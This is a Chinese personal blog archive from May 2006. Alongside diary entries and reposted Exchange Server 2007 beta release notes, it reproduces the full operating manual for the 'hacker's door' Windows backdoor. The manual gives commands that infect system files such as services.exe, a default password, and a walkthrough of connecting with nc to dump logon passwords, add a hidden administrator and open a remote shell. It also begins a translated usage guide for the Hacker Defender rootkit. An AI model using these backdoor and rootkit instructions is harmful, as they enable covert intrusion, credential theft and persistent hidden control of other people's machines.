2006年05月28日

今天是无聊的一天,因为好朋友纪飞要来北京,我怕他找不到我,于是一直在宾馆等他,结果一等再等都不见人来,唉。。。白白浪费了我一天的时间。以后还是不要等人的好。


既然无聊,所以就上网看东西啦,在一个收藏的做菜的网站上看到了一个关于“追债博客”的好玩事情,反正也是无聊嘛,就去看了看,没想搜索出一大堆结果。大致看了下内容,实际上内容很简单,就是一对男女,曾经是网络恋人,后来分手了,于是女方要求男方赔偿一些费用和感情债。这么一件简单的事情,就因为BLOG这个载体,闹得满网风云,哈哈。。试想,如果是几年前,这样的破事估计没几个人有兴趣去评论,可是现在不一样啊,有了BLOG这个红火的载体,一点小事也能被吵成明星啊。于是乎竟然有网站把这个做成了专题,呵呵,,当事人比超女还要热,一切都是BLOG引发的。


我到不想对这件事情做什么评论,本来“清官难断家务事”啊,何况我不是清官,感情的事情没什么对和错的,在一起的时候,什么都是对的,分开了,不爽了,就什么都不对了。这也无可非议啊,自己投入了感情,必然遭到伤害,那总要把这样的伤害转嫁到他人身上,才能获得一点心理平衡嘛。自己过的不好,也不要别人过的好,这就是中国人的劣根性吧。


看了各方的说法,都是公说公有理,婆说婆有理。本来嘛,感情的事连当事人都说不清楚,看客又有什么资格去发表意见呢。但就是因为这是BLOG啊,是个平民的舞台,所以是猫是狗都可以来发表一下自己的看法,即使他的看法是荒谬的,我们没有权利去限制别人的言论自由啊。


看起来以后要想出名太容易了,只要在BLOG上爆料一点自己的不齿趣事,或是发布点大家感兴趣的东西,管他是低俗或是荒谬,有人看就是硬道理。或者不惜丑化一下自己,或是透露点个人或他人的隐私,也是不错的选择,我保准你不出两天,就有中央电视台的记者上门找你的,信不信?


呵呵,,现在就是越有争议的东西越有人看,就象超女一样,也是闹的沸沸扬扬,不过无论是主办方还是当事人,都不觉得有什么问题,反而从骨子里希望闹下去,因为这样不仅可以提升知名度还可以有利益可获啊。无论当事人自己是不是希望通过这样的吵作来达到自己的目的,但事实就是它有吵作的嫌疑且确实有人从中获利了。


而这一切的缘由就是BLOG是一个平民化的东西,大家把它当做自家的菜园,可以随心所欲去发表自己的事情,好象自己的日记一样,可以无所不谈。而且大家还觉得这是言论自由的体现,其实错了,这不是言论自由的体现,而是对法律的践踏,你的行为已经构成了犯罪,你知道吗?所谓的言论自由,是指在不侵害他人利益情况下的言论自由发表权,如果你侵害了他人利益,就不再是言论了自由了。而BLOG做为一个半公开的网络媒体,可以吸引众多人的阅读,影响面很大,传播力很强,所以它不是你家的菜园,不能发表不应发表的言论,好比你做一个项目,你能把项目资料发布在BLOG上吗?显然不能,这是商业机密。同样的,你也不能发表有损他人利益的言论和评论。我认为国家应该对BLOG言论进行立法,禁止传播非法言论,也包括漫骂和对他人的隐私透露等。这样我们才能利用好BLOG这一载体。


BLOG是平民的东西,所以在中国有巨大的市场,想想看中国有1亿多网民,从这中间可以获得多大的利益啊,所以无论是IBM还是微软,都在致力于BLOG的运营,BSP更是多不胜数。可见其利益的巨大啊。但这些利益的获得不能以伤害他人利益为前提的啊,更不能挑起事端,引来关注,以达到自己的目的。


BLOG,希望你走好。。


 

2006年05月27日

 

The Exchange Server 2007 (formerly Exchange 12) Team is pleased to announce that a more recent Beta build is available for download, called DF4 (Dogfood 4). Here is a list of many of the updates:







Store:




In the Store area, we are adding several feature, these include:







  • Management and deployment of client and server for RPC/HTTP


  • Customizable and rich text format System Messages (such as the overall message & NDRs)


  • Management of Mailbox Locale


  • Messages sent via Outlook in cached mode will be uploaded only once


  • The ability to monitor and limit the resource consumption of individual users









Admin




All Work Centers (Recipient, Server, Organization, Toolbox) are complete..




All GUI is done for each role (mailbox, client access, edge, bridgehead, and unified messaging)




Start Page walks you through steps it may take to finish deploying advanced features on a server and step-by-step walk through configuration of complex features







Polished Console Look – New Vista style icons throughout console and cool wizard skin




Cmdlet Exposure in GUI – Management shell (monad) task details are shown at wizard completion













Cmdlet Infrastructure




Get/Set Permissions – the ability to set AD ACLs and MAPI Client perms with cmdlets




Shell enhancements 鈥?ability to support wildcards, improve identity / pipelining, support input from import-clixml, improved error reporting and what-if support for AD based cmdlets




Event Logging support 鈥?allows each actions performed to be logged to an NT eventlog




More granular delegation model 鈥?out of the box support for 4 *canned* roles (Exchange Org, Recipient, Server and View-Only) along with support for custom delegation via 鈥渟cripted鈥?solution leveraging E12 USG model and get/set permissions cmdlets







Directory




Encryption of AD traffic 鈥?all traffic between AD driver and the AD will be encrypted.




Preferred GC/DC for management 鈥?ability to specify a particular GC or DC when performing an operation




New Web Distribution Mechanism for OAB 鈥?allows us to run in a PF Free environment + leverage O12 usage of BITS to download the OAB




Added schema to enable support for a Hierarchical Address Book and Yomi Details templates




Schema Optimizations 鈥?upgrade from Ti to E12 will be faster, new install will be optimized and better progress will be provided (more granular schema files)







Migration




Administrative message removal 鈥?support for filtering messages in the move-mailbox task (e.g. Joe sent out the salary spreadsheet to the entire org, we have to get that out of people鈥檚 mailboxes before they see it!)




Move Content to a folder 鈥?ability to move messages to one folder within a mailbox




RSG support – support E12 RSG as source for move-mailbox




O12 Delegation support in X-Org moves 鈥?allows admin to move a delegate or a manager or both between organizations 鈥?assumes a two way trust







Setup




The ability to add/remove roles via add/remove programs, also includes, Role Picker, Guidance, Start Page, and Maintenance mode.




Updated AD preparation 鈥?/preparedlegacypermissions , /PrepareAD, /PrepareDomain




Delegated setup 鈥?ability to have a lower level (non Exchange Org Admin) to install certain Exchange servers




Unified Setup Log file 鈥?one log file that contains all relative setup execution steps which will make it easier to troubleshoot setup problems







Monitoring:







  • 64-bit Support for MOM


  • MOM Reporting Server for all Reports


  • Availability Reports: UM, ActiveSync, and Availability Summary


  • Message Hygiene Reports: Content, Connection, Recipient, Sender, and Attachment Filters, and Protocol Analysis


  • Disk Performance Report


  • Mailbox Count Report






Calendaring:




Calendar diagnosability: server-side logging plus in-depth analysis of calendars to find and fix any consistency issues




Notify organizer when a recipient forwards a meeting.




Modifying the 鈥淐alendar Options鈥?page in OWA to enable control of our server-side calendar attendant.







  • Enabling customizable response messages and control of resource booking through an OWA options page.









Email Lifecycle Policies:







  • Replicating a user鈥檚 folder hierarchy under in their clean-up folders so they can better review what is heading for expiration


  • ELC logging for compliance reporting.






HA/DR:




In the HA/DR area, we are adding a critical set of features to fill out our E12 HA, Replication and DR solutions. These include:










  • Automatic Initial Seeding of the replica: completely automatic configuration


  • Incremental Reseeding when the 2 copies diverge: after a failure, instead of recopying of data back to the primary, only a small fraction of the data needs to be recopied


  • Transport Dumpster Queue to recoup data loss on lossy-failovers: taking advantage of the persisted transport queues to recovery mail still caught in the last log file when the JET DB Log drive fails.


  • Web Quorum from MSCS: eliminating the need for a 3rd server to act as a voter with our CCR servers.


  • Content Indexing support in CCR configuration


  • Redundant Network Path support on log copy









The Edge







Active Message Protection – The next generation of antispam technologies.




Intelligent Message Filter with signatures to improve accuracy.




IPRS – Ability to learn locally from sender behavior and block connections from misbehaving senders.




Edge Rules – deploy rules to reject mail storms /floods / worms at the edge.







Message Layer Security (MLS)




An internet scale key exchange and message encryption technology designed to allow adhoc messaging security. Messages delivered via MLS can be authenticated to the senders internet domain, and are kept confidential from sending domain to recipient domain. These messages will be shown in Outlook 12 (in B2TR) and OWA (later build TBD) with special security icons similar to client S/MIME.







Edge Subscriptions




ActiveDirectory configuration data is securely replicated out to edge servers to reduce the pain of managing recipient filtering, safe senders, edge-bridgehead routing and remote domain policies.







The Bridgehead







Accepted and Remote Domain Policies




Configure security requirements and delivery restrictions for communications with specific domains




Supports TLS, MLS, Basic Auth+TLS and External security mechanism







Compliance Features




Message Classifications 鈥?Admin can deploy rules and message classifications to deploy custom message policies. OLK12 users can associate a class with a message at compose time.




Organizational (Bridgehead) Rules – deploy rules to restrict messaging based on sender / recipient / content.




Journaling – retain copies of messages sent to / from users or members of groups













RMS integration




Prelicensing 鈥?Rights Managed messages have a license attached to allow roaming access to content without a public facing RMS server.










Web Services




Client-scheduled (“pull”) notifications & server-scheduled (“push”) notifications




Contacts




Tasks




Recurring PIM items (calendar items and tasks)




Full MAPI property support




Improved development experience




MOM integration




Read receipt handling




Improved server to server authentication delegation




Grouped searches




Search and search folders




Item and query language support




Attachment support




HTML and plain-text append




POP and IMAP




IMAP search




POP and IMAP Calendar URI inclusion




Unified Messaging




Speech recognition for Email




Speech recognition for Voicemail




Speech recognition for Contacts




Resolving callers against contacts




IP PBX inter-op




Multi-language setup




Improved prompt provisioning for the Automated Attendant




Completion of performance counters and events




Runtime system diagnostics




GSM codec support




TLS support







Sync




What鈥檚 new for the Information Worker with E12 and Crossbow







HTML Email 鈥?HTML message formatting is preserved when reading, replying-to, or forwarding email (Note this feature does not require Crossbow).







Email Flagging 鈥?Set flags, mark flagged items complete or clear flagged items from the mobile device. Items flagged on the device will appear in the ToDo bar in Outlook 12.










Search 鈥?Search your mailbox for any items not on your device. Read, download attachments, reply-to, or forward any item within your search results.










Sharepoint / UNC Document Access 鈥?/SPAN> Click on a link in email that points to a file in a Sharepoint Document Library or UNC share and download that item. In E12 Beta 2 we will be working with the Windows Mobile team to deliver a full-featured browse experience, enabling you to click on a link to a folder or item within email, type in a URL, or select from a list of favorites that mirrors your OWA favorites when browsing Sharepoint Doc Libraries or UNC shares.







Faster Fetch 鈥?Quickly download the rest of large items that were truncated when initially synchronized to the device







Out of Office 鈥?Turn OOF off/on and edit your OOF message from your mobile device







Improved Calendaring on the Device – View attendee status for meetings you鈥檝e organized. Forward, reply-to, & reply-all-to appointments in your calendar on the mobile device. Crossbow will also implement the calendar workflow changes for improved meeting reliability (i.e. changes to key properties like location must generate a meeting update).







IRM Prelicensing – Greatly improved user experience (works offline, low latency to read content) for rights protected content synchronized to the device. (Uses Edge feature coming in Beta 2)










IT Pro







For our IT Professional we are focusing on three major themes:




- Keep the data on the device secure




- Make it easy to provision devices over-the-air




- Keep it easy (read “cheap”) to support







In Beta 2 we are focusing on:







Additional Device Security Settings 鈥?Support for more robust password settings, device encryption, plus the ability to control SharePoint/UNC Document access, Camera, and SMS.




Sync administration built into ESM 鈥?IT Pros can create new mobile sync polices, assign users to policies, remote wipe and remove devices all from ESM.




Exchange ActiveSync Reports – Out-of-the-box reporting to show per user and per server Sync activity. CSV output is easily importable into SQL reporting solution.




Password Recovery 鈥?Enable devices to send up a temporary recovery password to unlock a device.




Synthetic ActiveSync Transactions 鈥?Provide the IT Pro the ability to monitor the health of their Exchange ActiveSync deployment through with this monad task.




MOM Support 鈥?Monitor overall health of Exchange ActiveSync through MOM integration.










OWA







For OWA Premium:




Junk Mail and Anti-Phishing




Change Password




Print




Working Hours interop with Outlook




Explicit Logon




Report forms (read receipt, ndrs, no *send again*)




Flags and Categories, including Advanced Search UI




Help UI




Redirection and Proxying between CAS servers




Quotas, Policy, Compliance




Read Search Folders created by other clients




Spellchecking




Tasks Views and Forms




Web Parts for SPS interop







For OWA Light (formerly known as OWA Basic):




Folder Management




Move Item




Meeting Request/Invitation/Response




Recurrence




Remaining Options




Contacts View and Form




FBA+SSL by default







2006年05月25日

今天是返回北京的第一天工作,仍然有很多的事情要做,整理项目完成文档,总结群集问题汇报,等等。。


纪飞要到北京来上班了,他是IBM的测试工程师,哈哈,,不错不错。


明天还要加班,呵呵。。

2006年05月24日

今天是返回北京的日子,由于车是早上8点半的,所以我们起得都很早,昨天晚上就依次通知了早上8点在大堂集合的消息。我是在早上6点起来的,去餐厅吃了早餐后,回房间整理好东西,就下楼退房了。我们一共住了9天的时间,这次的实施总体来说是顺利的。心情很好。。


由于是早上,退房的人很多,手续办理了很长时间,而且由于饭店不能提供住宿明细单,这到是一个麻烦的事情,只好让其在发票上详细说明天数,呵呵。。(我们不提供明细不能报销的)处理好全部事情后,我们分批打车来到了距离饭店大约5公里的客运站。


到达后,检票上车,一切很顺利啊,心情所以很好很好。8点半,车准时离开,我们回家了,路上需要6个半小时,呵呵,,可以好好休息了。


可惜的是好景不长,车刚上高速公路,就发现车后部冒烟了,啊?司机连忙停车检查,发现是一个液压油管断了,液压油全部漏了,车看来是没法开了,等着吧。说是来人来修理,呵呵,。原以为等个几十分钟就好了吧,没想到一等就是2个小时过去了,郁闷啊。


更让我郁闷的是,在等修理的2个小时里,我们亲眼目睹了一场交通事故,一辆三菱车为了超过前面的客车,快速的撞向了中间隔离拦,又被隔离拦弹到了路的另一边的隔离栏上,再次反弹后停在了路中间,车头都烂了,车轮也飞了,所辛的是车里的三个人安然无恙。这一系列的动作几乎是一瞬间完成的,我们都吓住了。


我下车用手机记录下了撞坏的车的样子,真的很可怕的。



又等了一会,来修理的人终于来了,然而经过一个多小时的修理后,仍无法修好。这下只能换车了,于是我们缓慢的开到了前面的高速路口,换了另一辆车,这才继续向北京行驶了。这一来,我们已经在这里耽搁了整整4个小时了。


好在之后的行程还算比较顺利,在延迟了近4个小时后的晚上7点多,我们终于到达了北京。这次的行程真的是郁闷透了,呵呵。。


昨天,也就是我们出发的前一天,也在几乎同一个的位置上,在京沈高速518公里处,也发生了一起28车连环相撞的恶性事故,今天又在这里发生了事故,所幸的是没有人员伤亡。看来以后还是座火车比较安全的说,呵呵。。


晚上7点半多,我安全到达了宾馆,睡觉了,困。。。


明天又要开始上班了,下次行程已经确定。


 

2006年05月21日

    黑客之门(hacker’s door) 1.0 版      
 黑客之门采用的目前一些先进的后门技术,它只有一个dll文件,通过感染系统文件启动自身,被
感染的系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;它本身不开端口,而是重用系统
进程开的任意一个端口,如80,135,139,445等,因此它的隐藏性是非常好的,而且穿透防火墙也是很容易的事情
。这个版本文件不大,只提供一些很有用的命令。目前还没有发现任何工具能查到这个后门,象fport,klist
er,RKDetector等查后门的工具都失效了。


申明:本人发布这个工具是为了向大家展示最新的后门技术,使大家能够更好的防范它,同时提高自己的技术,
对于使用本工具造成的后果,本人盖不负责。


(如果你对使用说明中有什么不理解的,可以看动画教程,在我的主页上有,
动画教程中的“0CLOGI0”应该为“NCLOGIN”,不知道这个录像软件有什么问题,
把N录成0了)


  
一、配置
  运行HDConfig.exe,选择要进行配置的黑客之门服务器端,默认是hkdoordll.dll,加载的时候会提示你输入密码,
如果你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码,然后你就可以修改密码了。这个密码用于
连接和卸载后门。


二、安装


C:\>rundll32 hkdoordll,DllRegisterServer conime.exe 1


  上面的方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出了,适用于在自己的
机器上做测试,如果你不是做测试,就用下面的安装方式。


其中 hkdoordll是黑客之门服务器端,必须放在system32目录下,可以改名,conime.exe是你要感染的进程
默认是services.exe,如果要感染系统文件,在system32目录下的不用带路径,其它的就要带路径,第一个1是安装方式,
0表示只感染系统文件,1表示只感染进程,2表示感染系统文件,同时感染进程,默认是2;


C:\>rundll32 hkdoordll,DllRegisterServer


上面是默认安装方式,它会感染services.exe文件,以便在系统重启时启动后门,同时把自己加载到
services.exe进程中
注意:除了csrss.exe,smss.exe外,其它的系统文件都可以感染


要判断有没有安装成功,就要看system.log里的信息,方法如下:


C:\WINNT\system32>type system.log  //这个文件的生成会有延时,多type几次
系统找不到指定的文件。


C:\WINNT\system32>type system.log
9/2/2004 10:36:45 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,            Param[0]=C:\WINN
T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer
9/2/2004 10:36:45 l=0
Freeing “kernel.dll”:
9/2/2004 10:36:45 l=0
Couldn’t free


9/2/2004 10:36:45 l=0
Entering DLL_PROCESS_ATTACH,Process:SERVICES.EXE
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:45 l=0
Loading “kernel.dll”:
9/2/2004 10:36:45 l=0
Loaded (0×10000000)


9/2/2004 10:36:45 l=0
The backdoor is installed successfully!


9/2/2004 10:36:45 l=0
UnloadDriver successfully!
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:47 l=0
Start hacker’s door successfully!


C:\WINNT\system32>


看到“Start hacker’s door successfully!”就说明安装成功了,否则就是没有成功,
你可以试试感染别的系统文件。



C:\>rundll32 hkdoordll,DllRegisterServer lsass.exe


上面是感染lsass.exe文件,同时把自己加载到lsass.exe进程中


C:\>rundll32 hkdoordll,DllRegisterServer c:\winnt\explorer.exe


上面是感染explorer.exe文件,同时把自己加载到explorer.exe进程中


注意:
 安装成功或失败信息在system32\system.log里有记录。


在终端服务器中,直接安装出现如下错误:


C:\WINNT\system32>rundll32 kernel,DllRegisterServer


C:\WINNT\system32>type system.log
9/2/2004 10:46:28 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,            Param[0]=C:\WINN
T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer
9/2/2004 10:46:28 l=0
InjectThread:Error CreateRemoteThread,error code:8
9/2/2004 10:46:28 l=0
InjectThread failed!



C:\WINNT\system32>



因为在msdn里说


Terminal Services isolates each terminal session by design. Therefore,
CreateRemoteThread fails if the target process is in a different session
than the calling process.


因此你用下面的方法安装:


C:\WINNT\system32>psexec \\127.0.0.1 -u administrator cmd.exe


PsExec v1.31 – execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com


Password:


Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.


C:\WINNT\system32>rundll32 kernel,DllRegisterServer


C:\WINNT\system32>type system.log  //这个文件的生成会有延时,多type几次
系统找不到指定的文件。


C:\WINNT\system32>type system.log
9/2/2004 10:36:45 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,            Param[0]=C:\WINN
T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer
9/2/2004 10:36:45 l=0
Freeing “kernel.dll”:
9/2/2004 10:36:45 l=0
Couldn’t free


9/2/2004 10:36:45 l=0
Entering DLL_PROCESS_ATTACH,Process:SERVICES.EXE
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:45 l=0
Loading “kernel.dll”:
9/2/2004 10:36:45 l=0
Loaded (0×10000000)


9/2/2004 10:36:45 l=0
The backdoor is installed successfully!


9/2/2004 10:36:45 l=0
UnloadDriver successfully!
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:47 l=0
Start hacker’s door successfully!


C:\WINNT\system32>


这样就安装成功了


三、卸载


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac conime.exe 1


这里yyt_hac是连接密码,必须正确,否则不能卸载。其它的参数同安装意义差不多,它根据安装的
方法来卸载后门,上面一行的意思就是把后门从conime.exe卸掉。


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac 
上面就是把后门从services.exe进程中卸掉,同时修复被感染的services.exe文件。


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac  lsass.exe
上面就是把后门从lsass.exe进程中卸掉,同时修复被感染的lsass.exe文件。


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac  c:\winnt\explorer.exe


上面就是把后门从explorer.exe进程中卸掉,同时修复被感染的explorer.exe文件。


 卸载成功或失败信息在system32\system.log里有记录。
四、使用


 用nc连接被安装后门的机器的任意一个开的端口,这个端口必须能连接上,下面用139端口做例子,
然后输入“NCLOGIN 连接密码”,连接密码默认是yyt_hac,你可以在自己机器上试验,只要一台机器就可以了,
不需要在一台机器上安装,用另一台机器连接。支持多个连接,目前最多3个。
 注意:有好多人对这一步不知道怎么做,我打算做一个动画教程


先用xport扫描目标机器开的端口:


C:\>xport 192.8.8.1 1-300 -m tcp
X-Port v1.3 – command line port scanner
Code by glacier <glacier@xfocus.org>
http://www.xfocus.org


Scanning 192.8.8.1 1-300 …


Remote host:   192.8.8.1 (192.8.8.1)
Local address: 192.8.8.1
Scan mode:     TCP connect
Port count:    300
Thread count:  50


Port 135 is opened: [Unknown service]
Port 139 is opened: [Unknown service]


Port scan complete, total 300 port, 2 port is opened, use 8012 ms.


Match operate system failed.
Try to check operate system by netbios … succeed!
Remote operate system: Windows NT 5.0


上面就结果说明135,139端口都可以连接


C:\>nc 192.8.8.1 135   //用nc连接后门,先连接135端口试试
NCLOGIN 123456
        This is the server of hacker’s door made by yyt_hac,
Welcome to http://www.yythac.com,use ‘?’ to get command list
HKDOOR>?   //得到命令列表
?——————-[command],Get command list and the descript of the command
hdver——————-Get the version of hacker’s door installed
findpass——————-Get all logon user’s username and password
open3389——————-[port] [/r],with ‘port’ to special termserver ’s port
,with ‘/r’ to reboot system
opentelnet——————-[port],open telnet server with [port],default port
is 23
pslist——————-Get process list from remote machine
pskill——————-pID,Kill the process of remote machine
getsysinfo——————-Get the system info from remote machine
shutdown——————-[/r],With ‘/r’ to reboot system,else power off system


exitshell——————-Exit the shell of hacker’s door
winexec——————-command,execute command using winexec function
openshell——————-[cmdfile],use cmdfile to create a process to execute
 command
HKDOOR>findpass   //查找当前登录用户的密码
The session:0 login information is:
Domain:YYT_HAC,User:Administrator,Password:123456
HKDOOR>hdver
The version of hacker’s door server is 1.0
Welcome to http://www.yythac.com
HKDOOR>getsysinfo   //得到目标机器的基本信息
Number of CPU:1
Type of CPU:Intel  Pentium III or high
System Version:Windows nt 5.0 build:2195
Service Pack:4.0
Product type:Windows 2000 Server
Computer Name:YYT_HAC
System Dir:C:\WINNT\system32
HKDOOR>winexec “net user test /add” //不开命令行窗口执行命令,加一个test的用户
The command execute sucessfully!
HKDOOR>winexec “net localgroup administrators test /add”  //把test用户加入管理员组
The command execute sucessfully!
HKDOOR>openshell    //开命令行窗口
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.


C:\WINNT\system32>
C:\WINNT\system32>cd \
cd \


C:\>net user     //查看用户,发现test用户加进来了
net user


\\ 的用户帐户


——————————————————————————-
__vmware_user__          Administrator            ASPNET
Guest                    IUSR_YYT                 IWAM_YYT
TsInternetUser           VUSR_YYT                 VUSR_YYT_HAC
test
命令运行完毕,但发生一个或多个错误。



C:\>dir
dir
 驱动器 C 中的卷是 windows
 卷的序列号是 3C85-544F


 C:\ 的目录


2004-03-24  12:12       <DIR>          DELL
2004-08-08  10:04       <DIR>          Documents and Settings
2004-09-02  22:20       <DIR>          Downloads
2004-03-22  09:28       <DIR>          DRIVERS
2004-05-30  21:21       <DIR>          drvrtmp
2004-09-02  22:44       <DIR>          hkdoor
2003-08-18  03:02       <DIR>          Inetpub
2004-04-28  16:20       <DIR>          log
2004-05-30  00:02       <DIR>          My Music
2004-09-02  18:17       <DIR>          Program Files
2003-08-16  16:03       <DIR>          WINDOWS
2004-09-02  22:20       <DIR>          WINNT
               0 个文件              0 字节
              12 个目录    324,079,616 可用字节


C:\>set
set
ALLUSERSPROFILE=C:\Documents and Settings\All Users.WINNT
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=YYT_HAC
ComSpec=C:\WINNT\system32\cmd.exe
DRIVERNETWORKS=C:\PROGRA~1\COMPUW~1\DRIVER~1\DRIVER~2
DRIVERWORKS=C:\PROGRA~1\COMPUW~1\DRIVER~1\DRIVER~3
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:\WINNT\system32\os2\dll;
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 9 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0905
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINNT
TEMP=C:\WINNT\TEMP
TMP=C:\WINNT\TEMP
USERPROFILE=C:\Documents and Settings\Default User.WINNT
windir=C:\WINNT


C:\>ver
ver


Microsoft Windows 2000 [Version 5.00.2195]


C:\>d:
d:
设备未就绪。


C:\>f:
f:


F:\>dir
dir
 驱动器 F 中的卷是 vc
 卷的序列号是 EED5-F051


 F:\ 的目录


2004-08-10  14:29       <DIR>          Documents and Settings
2004-03-08  18:07       <DIR>          fore
2004-03-22  20:01       <DIR>          i386
2003-09-07  05:37       <DIR>          My Music
2004-03-22  16:24       <DIR>          NTDDK
2004-06-17  18:15       <DIR>          ON2000
2004-08-19  16:26       <DIR>          ON2000_new
2004-03-26  13:59       <DIR>          Perl
2004-07-28  12:46       <DIR>          Program Files
2004-03-25  09:19       <DIR>          sourcecode
2004-07-28  12:44       <DIR>          WINNT
2004-09-02  22:43       <DIR>          WUTemp
               0 个文件              0 字节
              12 个目录    921,036,288 可用字节


F:\>pslist    //查看目标机器上的进程
ProcessID         ProcessName
0                   [System Process]
8                   System
184                 SMSS.EXE
208                 CSRSS.EXE
228                 WINLOGON.EXE
256                 services.exe
268                 LSASS.EXE
476                 svchost.exe
504                 spoolsv.exe
544                 msdtc.exe
652                 svchost.exe
680                 mdm.exe
736                 alertsvc.exe
804                 navapsvc.exe
884                 npssvc.exe
1204                regsvc.exe
1216                mstask.exe
1252                termsrv.exe
1284                vmware-authd.ex
1296                WinMgmt.exe
1324                dfssvc.exe
1336                svchost.exe
1476                explorer.exe
1636                pctspk.exe
1684                hkcmd.exe
1704                Apoint.exe
1648                PFW.exe
1708                prpcui.exe
1732                realsched.exe
1740                ApntEx.exe
1748                internat.exe
1768                conime.exe
1804                navapw32.exe
640                 inetinfo.exe
1516                svchost.exe
1856                FlashBack Recor
1816                DG-506C.exe
1580                TASKMGR.EXE
1588                notepad.exe
388                 notepad.exe
2024                CMD.EXE
2036                NC.EXE
2004                CMD.EXE


F:\>pskill 1684   //杀掉进程id为1684的进程
The process has been killed!


F:\>exit   //退出命令行窗口


HKDOOR>?   //得到命令列表
?——————-[command],Get command list and the descript of the command
hdver——————-Get the version of hacker’s door installed
findpass——————-Get all logon user’s username and password
open3389——————-[port] [/r],with ‘port’ to special termserver ’s port
,with ‘/r’ to reboot system
opentelnet——————-[port],open telnet server with [port],default port
is 23
pslist——————-Get process list from remote machine
pskill——————-pID,Kill the process of remote machine
getsysinfo——————-Get the system info from remote machine
shutdown——————-[/r],With ‘/r’ to reboot system,else power off system


exitshell——————-Exit the shell of hacker’s door
winexec——————-command,execute command using winexec function
openshell——————-[cmdfile],use cmdfile to create a process to execute
 command
HKDOOR>exitshell  //退出后门
Exit Successfully


C:\>nc 192.8.8.1 139  //通过139端口连接后门
NCLOGIN 123456
        This is the server of hacker’s door made by yyt_hac,
Welcome to http://www.yythac.com,use ‘?’ to get command list
HKDOOR>openshell
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.


C:\WINNT\system32>
C:\WINNT\system32>rundll32 kernel,DllUnRegisterServer 123456  //卸载后门
The command is too long to recv completely!


C:\WINNT\system32>exit


HKDOOR>exitshell
Exit Successfully


C:\>



五、和我联系


如果你发现的bug,请和我联系,最好说明使用的环境,同时把system32\system.log发给我。


个人主页:http://www.yythac.com
Email:webmaster@yythac.com
      yyt_hac@163.com
QQ:47090005


 


 

PJF的BLOG:http://pjf.blogone.net/


Rootkit.com:http://www.rootkit.com/index.php


持续补充中……

=============[Hacker defender -中文使用说明]================


                      NT Rootkit

                      ———-


作者:     Holy_Father <_father@phreaker.net”>holy_father@phreaker.net>

        Ratter/29A <ratter@atlas.cz>

版本:     1.0.0


开发日期:   01.01.2004


网站:     http://rootkit.host.sk, http://hxdef.czweb.org


开发群:   ch0pper <THEMASKDEMON@flashmail.com>

      aT4r <at4r@hotmail.com>

      phj34r <phj34r@vmatrics.net>

      unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>

      rebrinak

      GuYoMe

      ierdna <ierdna@go.ro>

      Afakasf <undefeatable@pobox.sk>


说明:   Czech & English by holy_father

      French by GuYoMe

      Chinese by Ziqi


 


=====[1,目录]==============================================


1. 目录

2. 概要

    2.1 关于

    2.2 申明

3. 使用说明

4. Ini文件说明

5. Backdoor

    5.1 Redirector

6. 技术支持

    6.1 版本

    6.2 钩子API函数

    6.3 已知的 bugs

7. Faq

8. 文件


 


=====[ 2. 关于]================================================

Hacker defender (hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows XP操作系统的一个NTROOKIT,它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI 6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。

=====[ 2.1 概要 ]=============================================

程序的主要功能是在所有运行中的进程中重写分割内存,重写一些基本的模块改变进程的状态,它几乎能够改写所有不影响系统稳定和正在运行中的进程。

程序能够完全隐藏,现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务,构造系统驱动。其本身的后门技术允许其植入 redirector。

=====[ 2.2 申明]====================================================

本项目1.0.0版本是开发源代码

使用Hacker defender所造成的后果作者本人概不负责。


=====[ 3. 用法 ]==================================================

    一个使用hxdef的简单例子:


    >hxdef100.exe [inifile]

或者

    >hxdef100.exe [switch]

直接执行EXE文件,不带任何的参数时候,默认的inifile文件为程序名.ini 。


当你执行hedef100不指定ini文件,或者你以参数模式运行时候,默认的文件是


hxdef100.ini。


下面的参数是有效的:

    -:installonly     -     只安装服务,不运行

    -:refresh     -     从INI文件中更新设置

    -:noservice     -     正常运行不安装服务

    -:uninstall     -     移除hxdef删除所有运行的后门连接,同时停止hxdef服务

                 


例如:

    >hxdef100.exe -:refresh


Hxdef拥有默认INI文件,但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。

